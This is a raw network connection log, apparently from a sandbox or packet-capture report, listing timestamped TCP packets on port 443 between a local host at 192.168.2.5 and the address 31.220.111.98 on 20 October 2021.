                                                              Oct 20, 2021 15:12:10.641976118 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.642002106 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.642051935 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.643449068 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.650343895 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.650398970 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.650432110 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.650474072 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.650556087 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.656586885 CEST49963443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.656631947 CEST4434996331.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.788908005 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.788954020 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.789304972 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.790129900 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.790157080 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.904614925 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.907011986 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.908690929 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.908711910 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:10.912336111 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:10.912354946 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615567923 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615597963 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615621090 CEST4434996731.220.111.98192.168.2.5
                                                              Oct 20, 2021 15:12:11.615658045 CEST49967443192.168.2.531.220.111.98
                                                              Oct 20, 2021 15:12:11.615683079 CEST4434996731.220.111.98192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 20, 2021 15:12:11.615694046 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.615699053 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.615741968 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.780949116 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.780982018 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.781054974 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.781075954 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.784914970 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.818072081 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.818109989 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.819366932 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.819386959 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.819447041 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.987236023 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.987271070 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.987343073 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.987359047 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:11.987386942 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:11.987412930 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.189318895 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.189357996 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.189812899 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.189826965 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.189884901 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.397382975 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.397401094 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.397447109 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.400253057 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.400281906 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.400585890 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.434607983 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.434643984 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.434731960 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.434752941 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.434855938 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.612653017 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.612679958 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.615899086 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.615928888 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.615947962 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.616388083 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.822381973 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.822416067 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.825484991 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.825515985 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.826525927 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.860184908 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.860224009 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.866394997 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:12.866417885 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:12.868021011 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.007164001 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.007194042 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.008735895 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.008757114 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.009177923 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.044493914 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.044528008 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.044622898 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.044644117 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.044672966 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.045346975 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.196120024 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.196149111 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.197027922 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.197240114 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.197263002 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.197274923 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.197938919 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.198229074 CEST | 49967 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.198245049 CEST | 443 | 49967 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.825256109 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.825293064 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.825421095 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.826503038 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.826520920 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.936471939 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.936741114 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.937686920 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.937695026 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:13.940700054 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:13.940715075 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:14.386214018 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:14.386236906 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:14.386312008 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:14.394184113 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:14.395205975 CEST | 49968 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:14.395234108 CEST | 443 | 49968 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:14.857882023 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:14.857923985 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:14.858266115 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:14.938184023 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:14.938226938 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:15.050404072 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:15.055325985 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:15.535948992 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:15.536000013 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:15.536308050 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:15.536595106 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:15.540883064 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:15.583144903 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.536659956 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.536714077 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.536748886 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.538614035 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:16.538644075 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.551147938 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.554601908 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:16.837598085 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.837613106 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.837682009 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.841449022 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:16.841475010 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.851932049 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:16.851955891 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:16.854151011 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:16.854353905 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.114180088 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.114212036 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.119307041 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.119333029 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.119348049 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.119555950 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.412308931 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.412334919 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.412390947 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.413142920 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.413170099 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.413465023 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.448256016 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.448297977 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.451818943 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.460438967 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.460462093 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.464982033 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.716460943 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.716487885 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.716551065 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.724087000 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.724117994 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:17.724186897 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:17.724442005 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.028058052 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.028084040 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.028131962 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.034205914 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.034223080 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.034275055 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.034282923 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.034347057 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.034427881 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.065552950 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.065571070 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.065635920 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.065651894 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.083158970 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.084815025 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.095779896 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.336282969 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.336297989 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.336313963 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.336379051 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.336424112 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.341046095 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.341072083 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.342209101 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.371237040 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.371252060 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.371268988 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.371304989 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.371335030 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.371354103 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.375051975 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.390116930 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.404884100 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.404928923 CEST | 443 | 49969 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:18.404942989 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:18.479617119 CEST | 49969 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.444061041 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.444087982 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:20.444206953 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.445069075 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.445084095 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:20.559720993 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:20.559808969 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.569035053 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.569073915 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:20.574294090 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:20.574320078 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.243057966 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.243088961 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.243194103 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.243212938 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.243242025 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.243285894 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.243313074 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.399446011 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.399477005 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.399665117 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.399691105 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.399769068 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.441349030 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.442933083 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.443368912 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.443391085 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.443403006 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.448762894 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.591243029 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.591296911 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.592006922 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.592077017 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.592252016 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.789295912 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.789335966 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.789419889 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.789443016 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.789458990 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.789485931 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.989392996 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.989427090 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.989605904 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.989630938 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:21.989672899 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:21.989684105 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.026868105 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.026906967 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.027137995 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.027162075 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.027232885 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.185477972 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.185519934 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.185672998 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.185698032 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.185760021 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.379343987 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.379380941 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.379452944 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.379476070 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.379497051 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.379528046 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.417476892 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.417505026 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.417627096 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.417643070 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.417725086 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.572926044 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.572962999 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.573076010 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.573102951 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.573276997 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.610218048 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.610246897 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.610428095 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.610450983 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.610524893 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.773332119 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.773365974 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.773484945 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.773505926 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.773566008 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
Oct 20, 2021 15:12:22.774437904 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.774511099 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.774547100 CEST | 443 | 49970 | 31.220.111.98 | 192.168.2.5
Oct 20, 2021 15:12:22.774621964 CEST | 49970 | 443 | 192.168.2.5 | 31.220.111.98
